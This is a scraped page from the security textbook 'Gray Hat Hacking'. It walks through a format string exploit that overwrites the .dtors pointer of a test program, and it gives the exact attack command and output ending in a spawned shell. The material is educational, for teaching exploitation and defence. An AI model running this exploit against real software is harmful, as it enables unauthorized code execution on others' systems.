Gray Hat Hacking, Second Edition

Prev | Current Page 347 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

To get the first
pointer location or the end marker, simply add 4 bytes to the __DTOR_LIST__ location.
In our case, this is
0x08049518 + 4 = 0x0804951c (which goes in our second memory slot, bolded
in the following code)
Follow the same first column of Table 8-2 to calculate the required format string to
overwrite the new memory address 0x0804951c with the same address of the shellcode
as used earlier: 0xbfffff50 in our case. Here goes!
$ ./fmtstr `printf
"\x1e\x95\x04\x08\x1c\x95\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000648
Canary at 0x08049440 = 0x00000000
sh-2.

Pages:
335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359

The Art of Agile Development (page 40) Absalom's Hair (page 120) Absolute Surrender and Other Addresses (page 13)

Beta Book

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"